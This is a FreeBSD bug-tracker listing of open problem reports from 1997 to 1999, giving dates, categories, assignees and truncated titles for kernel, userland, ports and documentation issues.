o [1997/04/14] bin/3286 [PATCH] missing error checking in mount_m o [1997/04/14] kern/3287 [PATCH] missing symbols in /usr/src/sys/i o [1997/04/15] kern/3299 /dev/console hangs o [1997/04/17] bin/3314 [PATCH] /etc/daily did not run on April 6 o [1997/04/27] bin/3399 mv of symbolic link can move directory in o [1997/04/29] bin/3416 ibcs emulation problems o [1997/05/05] i386/3504 [PATCH] New features (and manpage) for ne o [1997/05/08] gnu/3552 the -L option of tar does not work proper s [1997/05/09] kern/3571 Mounted ext2 prevents umount of filesyste o [1997/05/12] kern/3584 luigi cleanup TCP_REASS macro in tcp_input.c o [1997/05/16] bin/3608 Telnet in linemode will break apart long o [1997/05/17] kern/3611 Internal CPU cache on CyrixiInstead DX2 d o [1997/05/20] docs/3645 torstenb TCP_wrappers package doesn't mention wher s [1997/05/21] bin/3648 roberto [PATCH] find(1) extension for file flags s [1997/05/22] kern/3667 [PATCH] make vn LKM'able. o [1997/06/02] bin/3762 dufault Bogus return values from rtprio(1) o [1997/06/07] bin/3805 single process tftpd o [1997/06/09] bin/3826 KerberosIV sometimes hangs rcp o [1997/06/10] bin/3837 dufault new feature for rtprio o [1997/06/12] kern/3853 luigi netboot/ns8390.c breaks NS datasheet o [1997/06/14] bin/3866 rcs2log fails with eastern timezones o [1997/06/15] kern/3879 peter Can't export mounted ext2fs via NFS o [1997/06/18] kern/3901 Multicast for Intel 10/100 Ethernet Card o [1997/06/19] misc/3912 ctags(1) cannot trace some macro correctl o [1997/06/23] kern/3938 peter Problem about mmap() over NFS o [1997/06/24] kern/3944 if_le doesnt receive ether multicast pack o [1997/06/25] kern/3948 nonworking t/tcp server side a [1997/06/25] kern/3953 kern-config: options PANIC_REBOOT_WAIT_TI o [1997/06/26] i386/3962 print disk internal cache size during pro o [1997/06/27] kern/3968 Hardware probes die on Peak SBCs. o [1997/06/29] ports/3983 fenner New port: psf toolkit o [1997/07/07] kern/4051 pppd connect 'chat ...' broken s [1997/07/07] kern/4052 VJ compression drops packets with IP+TCP o [1997/07/18] bin/4116 davidn Kerberized login as .root fails to o [1997/07/23] kern/4153 New tcp initial send sequence number code s [1997/07/24] bin/4157 [PATCH] netstat atalk output should print s [1997/07/26] bin/4172 suggest reconnection option added to fetc s [1997/07/28] kern/4184 [PATCH] minor nits in sys/netatalk s [1997/07/31] bin/4204 [PATCH] ac printed wrong report about tty o [1997/08/04] conf/4229 Ethernet interface unreachable on bootup o [1997/08/06] bin/4238 chpass only occasionally works in conjunc o [1997/08/07] kern/4243 file locking doesn't work for pipe o [1997/08/07] bin/4247 modification to /etc/security for FreeBSD o [1997/08/08] misc/4249 wpaul ypchsh doesn't care about changing a user o [1997/08/12] misc/4285 SDL RISCom/N2 (ISA) o [1997/08/13] kern/4297 dufault SIGEV_NONE and SIGEV_SIGNAL go in signal. o [1997/08/13] i386/4300 msmith The initial timeout on open("/dev/lpt0".. o [1997/08/14] ports/4304 asami Recommendation re. Ports Collection o [1997/08/22] ports/4356 erich sudo shouldn't block signals in tgetpass( o [1997/08/23] conf/4363 kernel build depend on make obj o [1997/08/29] kern/4413 No way to unmount a floppy that goes bad o [1997/08/29] bin/4419 man can display the same man page twice o [1997/08/29] bin/4420 find -exedir doesn't chdir for first entr o [1997/09/03] bin/4459 bde No prototype for moncontrol(3) and monsta o [1997/09/04] misc/4468 dlopen is not available from static execu o [1997/09/07] bin/4484 peter sendmail is barfing o [1997/09/13] kern/4528 processes hang if the mount_portal proces a [1997/09/14] i386/4538 sos byteswapped ATAPI id strings o [1997/09/14] bin/4545 f77 will only call `cc', no com-line opti s [1997/09/15] i386/4547 luigi asc.c and pcaudio.c should use selrecord o [1997/09/16] misc/4556 make can't build executable from single F o [1997/09/21] kern/4597 Patch to pass NPX status word in signal c o [1997/09/21] kern/4601 Contrib: userconfig patch to edit SCSI co o [1997/09/25] bin/4629 calendar doesn't print all dates sometime o [1997/09/28] misc/4646 Can't fixit with an NFS-mounted CD. o [1997/09/29] conf/4654 Need to do post-ifconfig commands o [1997/10/04] bin/4688 peter sys/utsname.h SYS_NMLN 32 too small o [1997/10/05] bin/4696 ping hangs on certain unresolvable hosts o [1997/10/05] bin/4697 make doesn't handle dependencies with for o [1997/10/15] gnu/4771 diff to correct misleading total bytes in o [1997/10/22] bin/4828 ypxfr makes false assumption about RPC ca o [1997/10/24] kern/4845 Boot complains about disk slices in FAT p o [1997/10/24] kern/4847 pccard stuff fails after running Win95 wi o [1997/11/01] bin/4915 peter NFS mounts to linux machine can hang syst o [1997/11/02] bin/4923 vi leaves the screen in standout mode o [1997/11/07] bin/4969 cdcontrol plays incorrect audio tracks in o [1997/11/08] bin/4975 quotaon while server very busy causes loc o [1997/11/09] kern/4992 SCSI disk scheduling disabled in 2.2.5 o [1997/11/10] kern/4997 DDB_UNATTENDED doesn't always work o [1997/11/11] kern/5009 ibcs2 emulation o [1997/11/11] kern/5011 rndcontrol -s 8 causes kernel panic o [1997/11/13] bin/5031 lpr does not remove original file if -s i o [1997/11/13] ports/5034 ache (tcsh) blocked write on named pipe sticks o [1997/11/14] gnu/5039 libdialog fails to resore terminal o [1997/11/14] kern/5040 Support for "SCSI-0" devices o [1997/11/14] kern/5048 Calling shutdown(fd,1) multiple times wil o [1997/11/15] kern/5059 peter mountd, nfsd, etc. fail when lp0 defined o [1997/11/15] kern/5060 Kernel doesn't compile with mss o [1997/11/20] kern/5108 pmap_release panics with 'freeing held pa o [1997/11/20] kern/5110 kernel crash & core in pmap_testbit durin o [1997/11/23] bin/5134 cdcontrol will eject a mounted CDROM o [1997/11/26] misc/5153 jkh release file checksums in wrong file s [1997/11/28] bin/5173 [PATCH] restore ought to deal with root s s [1997/11/30] i386/5182 bde [PATCH] A patch support high speed serial o [1997/12/09] bin/5263 sh bug (with example) s [1997/12/11] kern/5275 [PATCH] Added volume (barcode) support to o [1997/12/14] conf/5292 master.passwd -- /nonexistent vs. /sbin/n s [1997/12/14] bin/5296 slattach fails creating pidfile with ioct o [1997/12/22] kern/5362 peter mount incorrectly reports / as an NFS exp f [1997/12/30] i386/5398 silo overflows running o [1998/01/02] bin/5410 pkg_info options s [1998/01/03] bin/5419 [PATCH] timed rejects valid networks with o [1998/01/08] kern/5429 Ethernet collision during file transfers s [1998/01/08] bin/5444 [PATCH] ypserv uses wrong dns lookup orde o [1998/01/11] bin/5483 Login(1) clears utmp entry o [1998/01/15] kern/5502 nfsd process usage doesn't get accounted o [1998/01/15] kern/5508 SCSI Message sd0: COMMAND FAILED (4 28) @ s [1998/01/16] kern/5510 sos [PATCH] Incomplete ATAPI diagnostic at bo o [1998/01/18] kern/5517 Recursive NULLFS mount causes ufs_ihashge s [1998/01/20] misc/5531 [SUBMISSION] new library function abs2rel s [1998/01/20] kern/5532 [PATCH] Dropped packet counts are inaccur o [1998/01/21] bin/5537 vi dumps core with dodgy exrc file o [1998/01/24] i386/5559 PC-Card joystick ports were not supported o [1998/01/26] kern/5577 bde Unnecessary disk I/O and noatime ffs fixe a [1998/01/28] bin/5591 Trouble with LD_PRELOAD environment varia o [1998/01/31] bin/5609 lpd cannot send long files to HP's JetDir a [1998/02/02] ports/5626 billf 'ldap' port eats all available CPU time o [1998/02/02] kern/5627 Tertiary/Quaternary IDE Ctlrs: A few kern f [1998/02/05] misc/5662 sysinstall generates short dev names for o [1998/02/06] bin/5666 ifconfig fails to add alias o [1998/02/06] kern/5672 Crash from scsi aborted command 'Overlapp o [1998/02/09] kern/5689 sysctl vm.vmmeter - bogus and unsupported o [1998/02/10] bin/5711 bin/cat code cleanup o [1998/02/10] bin/5712 /bin/chio code cleaup and option added o [1998/02/10] bin/5717 pw -D -g "" returns error o [1998/02/10] bin/5718 pkg_delete refuses to run as non-root o [1998/02/14] bin/5745 [PATCH] Add /usr/local/share/mk to defaul o [1998/02/14] bin/5746 bootparamd will not netboot sun 3 compute o [1998/02/14] bin/5747 ld.so error message o [1998/02/15] bin/5758 sys/resources.h doesn't include sys/time. o [1998/02/17] kern/5768 Shutdown aborts syncing, when sync isn't o [1998/02/18] i386/5784 ibcs2 emulation not handling ioctl(..FION o [1998/02/19] ports/5788 joerg pcemu harddisk-access fixes o [1998/02/19] kern/5789 wcd0 requires ATAPI_STATIC o [1998/02/19] kern/5795 Panic: "bremfree: removing a buffer when o [1998/02/20] misc/5803 "tab" function from "ee" not compatible w o [1998/02/25] gnu/5841 installmost or install (world) of tmac fa o [1998/02/25] bin/5847 Makeworld fails if CXXFLAGS is set. s [1998/02/25] misc/5855 /etc/services is out of date with IANA o [1998/02/26] bin/5857 non-functional lpr/lpr o [1998/02/26] kern/5863 Kernel support for sorted SHUTDOWN & SHUT o [1998/03/01] bin/5880 df -t does not support devfs o [1998/03/01] ports/5884 dburr New port: icqjava-0.981a (net/icqjava) o [1998/03/02] bin/5901 new version of `fmt' o [1998/03/03] bin/5912 kinit exits if no user name specified o [1998/03/06] kern/5931 dma errors in syslog with GUS-max o [1998/03/06] i386/5932 perfmon kernel code should check for non- o [1998/03/08] bin/5944 cvs doesn't work correct. o [1998/03/10] kern/5964 peter nfsd send interface selection seems broke o [1998/03/10] ports/5972 andreas x11/fvwm95 requiring gsm, and rplay is a o [1998/03/11] gnu/5982 no error exit code from tar on child fail o [1998/03/12] gnu/5992 cvs y2k o [1998/03/13] bin/6000 kadmin ank uses bad default expiration of o [1998/03/15] bin/6015 indent(1) breaks source with backslash ne o [1998/03/16] kern/6032 poor TCP performance using FDDI over long o [1998/03/18] misc/6060 peter Sendmail executable, not doing MASQUERADE o [1998/03/22] conf/6096 /sys/i386/conf/LINT: edit(???) sound_conf o [1998/03/22] gnu/6107 gdb should support PRINTF_HAS_LONG_LONG o [1998/03/28] bin/6156 Patches to make dump understand ENOSPC o [1998/03/28] bin/6161 2.2.6 kerberos servers are awfully visibl o [1998/03/29] ports/6170 peter another squid ports o [1998/03/30] ports/6181 andy New port: xoj-1.0 o [1998/03/31] bin/6183 quota hangups o [1998/03/31] kern/6184 No error if resulting file pos in lseek i o [1998/04/01] bin/6187 peter mounting nfs directories with -b can caus o [1998/04/03] bin/6202 No way to detect removable media. o [1998/04/03] bin/6206 Enhancements to the shutdown program o [1998/04/04] kern/6213 peter NFS-mounted swap (via vnconfig) easily cr o [1998/04/04] bin/6214 ping sometimes cannot be killed with a Co o [1998/04/05] conf/6220 Too few ttyv devices in the -RELEASE syst s [1998/04/06] bin/6223 PST/DST bug in /bin/date o [1998/04/06] ports/6230 rse gfont_mkgdf calls wrong interpreter o [1998/04/06] bin/6234 ypserv -d is broken f [1998/04/07] kern/6247 Gravis UltraSound Classic no longer works o [1998/04/14] kern/6296 IP_HDRINCL sockets force header fields to a [1998/04/14] kern/6299 vmstat -i does not show PnP device interr s [1998/04/15] bin/6314 [PATCH] /usr/sbin/ac modification s [1998/04/16] ports/6315 kuriyama new port request: korean/htm o [1998/04/16] kern/6318 pppd does not update wtmp on hangup o [1998/04/16] misc/6320 Sometimes nohup isn't good enough. o [1998/04/17] bin/6332 bde /usr/include/time.h doesn't compile with o [1998/04/17] gnu/6338 Gnu tar not working properly with the -G o [1998/04/18] conf/6346 Kernel version strings need to relate to o [1998/04/20] bin/6359 routed does sent router discovry solicita s [1998/04/20] bin/6371 [PATCH?] fetch(1) uses HTTP_PROXY for ftp a [1998/04/27] kern/6432 IFF_NOARP does not affect ethernet interf o [1998/04/28] ports/6445 jkoshy New port: `fhist' o [1998/04/30] kern/6464 tcpdump doesn't recognize tun0 when it's o [1998/05/03] kern/6495 Need pci_unmap_mem and pci_unmap_port rou s [1998/05/04] bin/6509 [ALMOST PATCH] Allow dd to seek/skip to o s [1998/05/05] bin/6521 [MAYBE PATCH] "rmdir -p x/y/z/" fails o [1998/05/07] kern/6544 luigi Only get one channel through sound card o [1998/05/07] ports/6546 ache 3line ansi prompt in tcsh: cursor disappe o [1998/05/11] i386/6595 Old IP address persistent after change o [1998/05/12] misc/6612 bsd.man.mk can't handle man pages with ": o [1998/05/13] kern/6623 non-root user can crash system if disconn o [1998/05/13] conf/6624 davidn One class with nologin=/etc/nologin: reje o [1998/05/15] kern/6651 peter Possible NFS deadlock clue s [1998/05/16] bin/6658 [PATCH] -stable getcwd(3) performs unnece s [1998/05/17] kern/6668 [PATCH] new driver: Virtual Ethernet driv a [1998/05/26] misc/6759 phk buggy code in libdisk.a's disk.c o [1998/05/26] kern/6760 can't compile kernel w/o networking o [1998/05/26] kern/6769 peter panic: nfs rcvunlock s [1998/05/29] kern/6781 [PATCH] exabyte changer doesn't grok LUNs s [1998/05/29] bin/6785 place for all the default dump flags f [1998/05/31] ports/6813 fenner patched audio module for vat port o [1998/06/01] ports/6815 torstenb ssh lookup ignores second IP address o [1998/06/01] kern/6820 cd9660_mount NULL pointer deref for no CD o [1998/06/06] kern/6874 accounting prevents transition to multi u o [1998/06/13] misc/6936 sysinstall: install from MS-DOS MO divece o [1998/06/18] kern/6981 CD unmount w/o CD in drive can cause pani s [1998/06/19] bin/6995 [patch] Minor flaw in fdformat s [1998/06/19] bin/6997 [patch] vnconfig "open" error message con s [1998/06/21] kern/7014 [PATCH][STABLE] Add support for SiS 5591 o [1998/06/22] bin/7021 asami Size estimation patches to pkg_* o [1998/06/22] bin/7022 asami changes to bsd.port.mk to accompany PR bi o [1998/06/22] bin/7023 asami bsd.port.(%|subdir.).mk patches for size f [1998/06/23] kern/7029 gibbs cdrecord and aic7880 troubles f [1998/06/23] i386/7031 Our RocketPort port does not support DEVF s [1998/06/24] kern/7044 [PATCH] WaveLAN (2.4G, ISA, full-length b o [1998/06/25] docs/7065 wosch FreeBSD webpages -> applications, port br f [1998/06/25] bin/7068 markm /usr/bin/perl: library path addition s [1998/06/28] kern/7095 [stable] Gravis MAX in 2.2.6 suffers from s [1998/06/28] i386/7100 integrate pcvt configuration into the /et s [1998/07/01] bin/7136 kerberized telnetd doesn't use gettytab % s [1998/07/02] kern/7146 The PCCARD doesnt recognize cards in top s [1998/07/06] bin/7184 /usr/games/robots fails to write high sco s [1998/07/08] kern/7210 [PATCH] od(4) bug fixes and enhancements, s [1998/07/10] misc/7232 Suggestion for FreeBSD installation dialo o [1998/07/10] kern/7234 yokota keyboard problems during login immediatel f [1998/07/10] misc/7239 ping(8) and traceroute(8) may report erra o [1998/07/12] bin/7265 A warning flag is added to ln(1). o [1998/07/13] ports/7268 asami MASTER_SITE_OVERRIDE works more better o [1998/07/14] kern/7282 some old and rarely used drivers have app o [1998/07/14] ports/7283 ache tcsh / LC_CTYPE - obscure problem. o [1998/07/15] bin/7287 Incorrect domain name for MAP_UPDATE in m o [1998/07/16] bin/7298 Improvements to ln(1). a [1998/07/19] bin/7324 wosch Suggestions for minor modifications to ad o [1998/07/21] bin/7352 libc generates spurious warnings when use a [1998/07/23] ports/7375 dburr New port request: audio/xsplay f [1998/07/23] kern/7377 we have a new digiboard driver supporting s [1998/07/29] i386/7426 Bugs in macro definitions of pthreads. a [1998/07/31] docs/7456 doc dialog(3) man page outdated o [1998/08/01] ports/7464 dburr New port: WMakerconf o [1998/08/03] ports/7485 andy New port: Xterminal-0.2 s [1998/08/09] kern/7546 [PATCH] [STABLE ?]shutdown -p - system po f [1998/08/12] kern/7589 Tulip Driver parses SROM contents wrong f [1998/08/13] conf/7606 [PATCH] NIS Makefile.dist: NOPUSH replace o [1998/08/14] kern/7619 odd nfs server not responding messages ap o [1998/08/16] ports/7628 dburr new port: sajber-jukebox o [1998/08/16] bin/7632 Race condition in /stand/sysinstall f [1998/08/16] i386/7633 panic: page fault on install with boot.fl s [1998/08/18] bin/7669 libalias does not IRC DCC packets under c o [1998/08/19] ports/7680 billf New port of tn5250 o [1998/08/19] gnu/7687 description of default baud rate for cu c o [1998/08/20] kern/7693 Misleading warning in cblock_alloc_cblock o [1998/08/20] bin/7694 bogus error-message from route(8) o [1998/08/22] kern/7722 Changes to acct format o [1998/08/23] bin/7728 ftpd processes hang o [1998/08/27] bin/7753 arp command fails silently on invalid pro o [1998/08/28] misc/7771 Debugging putenv/getenv o [1998/08/29] ports/7774 torstenb sshd doesn't refuse to login people with o [1998/08/29] bin/7779 [PATCH] modload should detect stripped ke o [1998/08/30] kern/7782 Kernel rebuild not correctly responding t o [1998/08/30] bin/7786 quota.h has superfluous semicolon in macr a [1998/08/31] docs/7791 doc ipf(1) and ipfstat(1) should have been ip o [1998/09/01] gnu/7800 tar(1) does not recognize --gunzip option o [1998/09/02] i386/7816 dfr [Patch] NE2000 PnP card IDs to sys/i386/i o [1998/09/03] bin/7826 ls(1) knows too much about format of strf o [1998/09/03] bin/7828 Add a command line option to cp to make i o [1998/09/05] kern/7837 patches to add a p_auth extension pointer o [1998/09/07] ports/7845 tg Unbuffered /dev/vx0-output from Python 1. o [1998/09/07] bin/7846 /sbin/mount_* do not canonicalize the mou o [1998/09/07] misc/7850 lt_LT.* locale o [1998/09/07] kern/7856 Patches to add lkm hooks to cmsg_data anc o [1998/09/08] bin/7860 Extra option to pr(1). s [1998/09/08] bin/7868 [almost patch]Morse Code Fixups o [1998/09/08] bin/7869 Improved error messages from apm o [1998/09/09] misc/7873 poor initial configuration and documentat o [1998/09/11] bin/7895 multiple identical NFS mounts accepted o [1998/09/11] kern/7903 unmatched '{}' blocks. o [1998/09/15] ports/7932 torstenb man zshall doesn't work o [1998/09/16] misc/7946 ccdconfig gives confusing error when give o [1998/09/17] bin/7962 /usr/bin/ee prompts "save changes" when f o [1998/09/18] bin/7973 lpd: Bad control file owner in case of re o [1998/09/19] kern/7990 patch - teach kernel about RB_POWEROFF fl o [1998/09/19] ports/7992 ports New port: xemacs20-stepwise (XEmacs20 hac o [1998/09/20] bin/7998 pkg_add seems to have unneeded umask o [1998/09/20] misc/8005 yokota Keyboard freezes going from KDE to text m o [1998/09/21] kern/8015 [patch] Some sysctl descriptions for the o [1998/09/24] ports/8042 torstenb If pidentd dies, you must kill all telnet o [1998/09/26] bin/8060 install ignores the +X mode flag o [1998/09/27] conf/8061 profiling utilities seperate from profili o [1998/09/27] ports/8063 asami [PATCH] Add multiple CDROM support to bsd o [1998/09/29] bin/8084 NIT: non-working code in rshd o [1998/10/02] i386/8131 [patch] Support for PCI NE2000 compatible o [1998/10/03] misc/8133 markm [patch] bug in telnetd (Kerberos IV) o [1998/10/03] bin/8134 End of game is not recognised immediately o [1998/10/03] misc/8139 [patch] missing /usr/src/share/examples/d o [1998/10/04] bin/8142 freebsd 2.2.7 implementation of key(1) [s o [1998/10/04] i386/8146 [patch] kzipboot serial console setup and a [1998/10/06] bin/8163 [patch] It is impossible to assign quotas o [1998/10/06] i386/8171 [patch] Intel EtherExpress Pro 100 suppor o [1998/10/07] misc/8202 semop() is not wrapped for thread safety o [1998/10/08] bin/8211 Script to search kernel for an address o [1998/10/12] bin/8295 order of options in printcap causes some o [1998/10/13] conf/8303 3.0-981009-BETA can't make swap device on o [1998/10/13] kern/8311 kernel panic on de0 o [1998/10/16] misc/8346 Strftime can't generate ISO-8601 timezone o [1998/10/16] bin/8347 /usr/lib/compat build issues in 3.0 RELEA o [1998/10/16] kern/8349 [PATCH] Changer definition for SureStore f [1998/10/17] misc/8357 Segmentation fault while making SWARM-1.3 o [1998/10/19] kern/8376 CLOCK_VIRTUAL not implemented o [1998/10/19] misc/8378 Is termcap not maintained enough ? o [1998/10/22] kern/8420 __getcwd() from an (forcibly) unmounted f o [1998/10/24] misc/8434 boot.flp /bin/init crashes during probe w o [1998/10/24] i386/8436 boot.flp sysinstall crashes when probing o [1998/10/24] bin/8438 ex/vi: Error: tcsetattr: Interrupted syst o [1998/10/25] kern/8444 hm pcvt with more than 8 virtual consoles o [1998/10/25] docs/8445 doc Update of "Installing Mathematica on Free o [1998/10/27] i386/8474 repquota does not pick up NIS information o [1998/10/28] bin/8479 Final \'s in /etc/exports did not work in o [1998/10/30] kern/8498 Race condition between unp_gc() and accep o [1998/10/30] bin/8501 snake has a segmentation fault depending o [1998/10/30] conf/8517 rc.conf/rc fails to set ldconfig -aout o [1998/10/31] misc/8519 Murphy's Laws o [1998/11/01] conf/8531 sysinstall on 3.0-RELEASE (and 3.0-curren o [1998/11/03] bin/8553 /usr/libexec/mail.local doesn't handle "> o [1998/11/04] i386/8571 Bug in config utility in FreeBSD 2.2.6-RE o [1998/11/07] kern/8589 incorrect spelling for "dependency" and " o [1998/11/07] i386/8598 MAKEDEV fails if not run from current dir o [1998/11/08] kern/8604 ps u gets confused about process start ti o [1998/11/08] kern/8605 ipsec for ipv4, new version o [1998/11/08] ports/8620 asami New option to colorls - -K, color only to o [1998/11/09] bin/8631 pci interrupts are shown on EISA only mac o [1998/11/09] kern/8633 TCP packet via SLIP/CSLIP containing this s [1998/11/12] kern/8661 stb sys/netatalk/at_control.c needs to correc o [1998/11/12] bin/8666 X blocks serial port with getty process o o [1998/11/13] gnu/8679 tar man page should be updated o [1998/11/14] bin/8681 other macro name that has same number is o [1998/11/18] ports/8754 se KDE: KDM Display Manager has login proble o [1998/11/18] bin/8756 'pw' command additional feature request o [1998/11/19] misc/8764 pwd_mkdb is slow on many users o [1998/11/19] docs/8765 dwhite some suggested text for describing passwo o [1998/11/22] bin/8809 fdisk calls QNX-4 partitions unknown o [1998/11/22] bin/8811 Problem to use 'NLSMODE' variable in Make a [1998/11/25] ports/8864 ports useradd - system V compatible implementat o [1998/11/27] i386/8867 /stand/sysinstall core dumps (signal 11) o [1998/11/28] bin/8881 billf mv missing verbose switch o [1998/11/29] kern/8895 DEC 21152 PCI-PCI bridge chip isn't probe o [1998/11/29] kern/8898 PCI devices without an associated driver o [1998/11/30] bin/8913 negative time values for csh 'time' built o [1998/12/01] i386/8923 ctm 2.2.5 -> 2.2.7 error hu_HU.ISO_8859- o [1998/12/01] kern/8925 options kern file needs AWE_DEFAULT_MEM_S o [1998/12/03] i386/8953 BINFORMAT not defined in 2.2-STABLE o [1998/12/03] bin/8955 request CVS allow advisory locks on repos o [1998/12/06] misc/8986 install-info breaks installworld over nfs o [1998/12/06] bin/8989 (patch) chflags support for mtree(8) o [1998/12/08] bin/9012 route add -host hostIP -interface localIP o [1998/12/10] conf/9051 2.2.8R boot floppy won't write to fixit f o [1998/12/11] bin/9055 When used without arguments, ``set'' and a [1998/12/12] bin/9064 n_hibma [PATCH] propose adding `direct' option in o [1998/12/14] bin/9078 tunefs cant access mounted devices (vs. m o [1998/12/15] kern/9092 DELF raid volumes cause panics under CAM o [1998/12/16] i386/9102 Voxware does not provide /dev/mixer for E o [1998/12/16] ports/9107 asami Addition to bsd.port.mk for searching mul o [1998/12/17] bin/9118 default install of aout compat libs is in o [1998/12/18] bin/9123 pax can't read tar archives that contain o [1998/12/20] kern/9144 luigi acd driver inconsistency (byte order in C o [1998/12/21] conf/9160 /etc/services file corruption o [1998/12/22] bin/9176 dillon placemark to split mount_ufs out of mount o [1998/12/23] kern/9183 newton chroot(2) can be broken by the superuser. o [1998/12/24] bin/9188 telnet gets stuck in ttydrain() o [1998/12/27] bin/9206 sysinstall installation should create /st f [1998/12/28] misc/9220 nvi: catalog: mistake in Russian error me o [1998/12/28] bin/9226 telnetd can log wrong IP address to utmp o [1998/12/29] bin/9233 gmp's mpq_add and mpq_sub are buggy o [1998/12/30] conf/9245 obsolete locale setting in /usr/src/etc/{ o [1998/12/30] conf/9246 allscreens_flags in /etc/rc.conf not work o [1998/12/30] bin/9250 [PATCH] allow fetch to do ftp directory l o [1998/12/31] i386/9257 fpathconf() missing from libc_r o [1998/12/31] bin/9259 allow no prompt for yes in fdformat, but o [1999/01/02] bin/9281 awk asumes memory that is returned from m o [1999/01/03] ports/9286 andreas Patch for games/nethack-qt to fix compila o [1999/01/03] ports/9289 kris New Port - ASPostit (Dockable version of o [1999/01/04] kern/9316 Intel PILA8461 NIC panics 2.2.7 during pr o [1999/01/04] bin/9318 vgrind(1): no JAVA support o [1999/01/04] i386/9319 D-Link DE-528CT poor performance o [1999/01/05] bin/9333 timestamp dump's progress o [1999/01/05] i386/9341 tty-level buffer overflows o [1999/01/06] docs/9352 hoek wrong macro names in groff_[ms|mm|mmse].7 o [1999/01/07] bin/9374 Improved functionality for find(1) o [1999/01/08] conf/9388 magic(5) correction for wordperfect o [1999/01/08] kern/9392 Alternate system clock OR kernel stats cl f [1999/01/10] ports/9425 se KDE starting up from xdm has problem.... o [1999/01/13] bin/9470 aout-to-elf-build broken with kerberosIV- o [1999/01/13] kern/9474 "comcontrol rescan 0:8:0" hangs, causes o o [1999/01/14] bin/9494 new option to prevent mail from sending m o [1999/01/16] bin/9529 ftp filname completion can't handle space o [1999/01/17] bin/9536 make world installs aout compat libs in t o [1999/01/19] bin/9569 top(1) ignores tty EOF condition. o [1999/01/19] kern/9570 ed(4) irq config enhancement o [1999/01/19] bin/9573 ksrvtgt not working o [1999/01/20] misc/9582 configApache command doesn't work for /st o [1999/01/20] kern/9590 Clean up for -Wall warnings o [1999/01/21] kern/9611 MFS calculates the size incorrectly when o [1999/01/22] kern/9619 Restarting mountd kills existing mounts a [1999/01/24] ports/9657 ports Progressive Networks' RealAudio proxy por o [1999/01/25] kern/9679 fix for uninterruptible open in portal fi o [1999/01/25] kern/9689 panic in sbdrop(kern/uipc_socket2.c) o [1999/01/26] bin/9711 Fails: cd /usr/bin; gzip file ; mv file. o [1999/01/27] i386/9721 Patch for FreeBSD netboot (booting via DO o [1999/01/28] kern/9748 error in queue handling of at_shutdown() o [1999/01/28] bin/9770 An openpty(3) auxiliary program o [1999/01/29] i386/9777 luigi Generic AD1816 sound suport in Luigi's pc o [1999/01/29] misc/9778 Need to handle conflicting pthread.h and o [1999/01/29] ports/9786 cwt tk80 port doesn't create man page links o [1999/01/30] kern/9791 enhancement for netinet/ip_icmp.c to cont o [1999/01/30] ports/9792 msmith pib coredumps in port maker mode o [1999/01/30] ports/9795 obrien The Handbook is not clear on how to deal o [1999/01/30] bin/9809 finger output format wrong f [1999/01/30] ports/9811 nectar New port: lang/gnomeguile o [1999/01/30] ports/9812 nectar New port: devel/libgtopbindings o [1999/01/31] ports/9840 asami patch allows ports to fetch their sources o [1999/01/31] conf/9845 Propose adding options to rc.conf and rc. o [1999/01/31] kern/9848 ARP proxyall extra sanity check o [1999/02/01] bin/9868 Patch to add "date -a" o [1999/02/01] kern/9869 When using macros out of function, they s o [1999/02/01] conf/9874 idle-timeout facilities in /etc/login.con o [1999/02/03] bin/9893 NFS umount of regular file impossible o [1999/02/03] bin/9902 error in german (and some other) locale s o [1999/02/05] ports/9921 peter exmh2 ports update o [1999/02/06] bin/9931 config gives misleading error when duplic o [1999/02/07] ports/9954 ports New port: devel/ACE o [1999/02/08] bin/9972 groff always built for US (letter) sized o [1999/02/09] gnu/9987 jdp wrong (for FreeBSD) ELF_DYNAMIC_INTERPRET o [1999/02/09] bin/9990 Enhancement to filename completeion in cs o [1999/02/09] i386/9991 new driver for National Instruments GPIB o [1999/02/09] ports/9993 kris New Port - graphics/libunfig o [1999/02/09] ports/9998 kris New port - graphics/mtv (MpegTV player) o [1999/02/10] i386/10004 jkh instalation of current version from FTP s o [1999/02/10] ports/10007 ports Port of the mercury compiler version 0.8 o [1999/02/11] ports/10023 kris New port - net/gtkcookie o [1999/02/11] bin/10030 markm Kerberized telnet fails to encrypt when a o [1999/02/12] i386/10052 Matrox Millennium II AGP device/model id o [1999/02/14] docs/10085 doc NIS Setup Tutorial o [1999/02/14] kern/10095 missing VGA description o [1999/02/14] docs/10098 doc Lack of overall guide for NIS setup o [1999/02/15] gnu/10112 /usr/src/gnu/usr.bin/patch sorely out of o [1999/02/16] kern/10116 acd driver patch to support PD/CD drive. o [1999/02/16] ports/10124 ports UNIX|STAT pr submission failed to include f [1999/02/17] bin/10131 n_hibma bug in strptime(3) o [1999/02/18] docs/10146 jkh Release Notes and LINT for 3.1 include ha o [1999/02/18] kern/10149 New PCI device o [1999/02/19] bin/10158 Reference to ncheck in quot(8) o [1999/02/19] kern/10159 Unable to unload vinum module o [1999/02/19] kern/10160 kldload of umap module panics the system o [1999/02/19] ports/10162 se Fix kdmrc to add qmail usernames to NoUse o [1999/02/19] misc/10167 Upon exiting X11R6, monitor goes blank. o [1999/02/20] bin/10169 find -perm doesn't allow a bitwise o [1999/02/20] kern/10175 Bridging support incomplete for some netc o [1999/02/21] ports/10178 torstenb USE_SOCKS=YES option broken for security/ o [1999/02/22] ports/10196 torstenb Better startup scripts for ssh o [1999/02/22] ports/10215 rvb net/coda_client and net/coda_server o [1999/02/23] ports/10227 peter wrong sendmail path in rdist6-port a [1999/02/23] misc/10231 inet_addr() doesn't check for illegal val o [1999/02/25] docs/10240 doc We need a script which check if our web m o [1999/02/25] conf/10244 100 character limit on any pathname in sy o [1999/02/25] kern/10255 Some more SiS chipset PCI IDs for chipset o [1999/02/26] bin/10274 make does not understand "lib(obj)" synta o [1999/02/26] bin/10283 Race condition in rc.network o [1999/02/28] bin/10300 dmesg exits on signal 10 o [1999/03/01] misc/10325 Implementation of itoa() for libc o [1999/03/01] bin/10342 putenv(3) unnecessarily calls strdup/free o [1999/03/01] misc/10349 For long .Dt fields, rendering is broken- o [1999/03/02] misc/10351 /usr/share/examples/worm is out of date o [1999/03/02] bin/10358 ftp(1) has problems with long pathnames o [1999/03/05] ports/10396 asami SPIN is in the wrong category o [1999/03/06] kern/10440 Discard device does not set ifq_maxlen o [1999/03/06] bin/10444 avoiding lost mail when mail filesystem i o [1999/03/06] ports/10454 obrien Update: emulators/spim a [1999/03/06] kern/10455 pcaudio breakage o [1999/03/07] i386/10465 Must disable ex0 to install. o [1999/03/07] ports/10477 ports The fakemail in lib-src fails to link (ne o [1999/03/08] bin/10493 ipfw's undocumented feature s [1999/03/09] bin/10508 obrien isc-dhcp puts garbage to text options, V2 o [1999/03/10] bin/10522 make world died due -Werror o 